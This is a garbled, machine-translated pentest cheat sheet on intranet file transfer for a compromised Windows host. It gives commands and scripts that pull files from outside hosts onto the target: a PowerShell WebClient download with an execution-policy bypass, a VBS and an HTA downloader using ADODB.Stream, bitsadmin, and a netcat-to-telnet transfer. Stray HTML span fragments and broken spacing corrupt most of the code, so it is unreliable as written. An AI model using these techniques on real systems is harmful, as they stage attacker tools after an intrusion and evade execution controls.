Intranet File Transfer

Transfer from: Https://github.com/l3m0n/pentest_studywindows file transfer

1. powershell file download PowerShell break limit execution: Powershell-executionpolicy bypass-file. \1.ps1

$d = New-Object System.Net.WebClient$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")

2. vbs script File Download

SetXpost=createobject ("Microsoft.XMLHTTP")Xpost.OpenThe GET","Http://192.168.206.101/file.zip",0Xpost. Send ()SetSget=createobject ( ADODB. Streamsget. Mode=3sget.< Span class= "PL-C1" >type=1sGet< Span class= "Pl-k". Open () sget. Write xpost. Responsebodysget. SaveToFile  "C:\file.zip", 2   

Download execution:

cscript test.vbs

3, BITSAdmin win03 Test No, win08 have

bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip

4, file sharing mapped one, results do not have permission to write

net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword

5. Use Telnet to receive data

服务端：nc -lvp 23 < nc.exe下载端：telnet ip -f c:\nc.exe

6. The HTA is saved as an. hta file after running

<html><Head><Script>VarObject=NewActiveXObject ("MSXML2. XMLHTTP");Object.OpenThe GET","Http://192.168.206.101/demo.php.zip",FALSE);Object.Send ();if (Object.Status==200){ var Stream=NewActiveXObject ("ADODB. Stream"); Stream.Open (); Stream.Type=1; Stream.Write (Object.Responsebody); stream. SaveToFile ( "C:\\demo.zip", Span class= "PL-C1" >2);  stream. Close (); }window. Close (); </script><hta:application id= "Test" WINDOWSTATE =  "Minimize" ></head><< Span class= "pl-ent" >body></body></HTML>    

Network File Transfer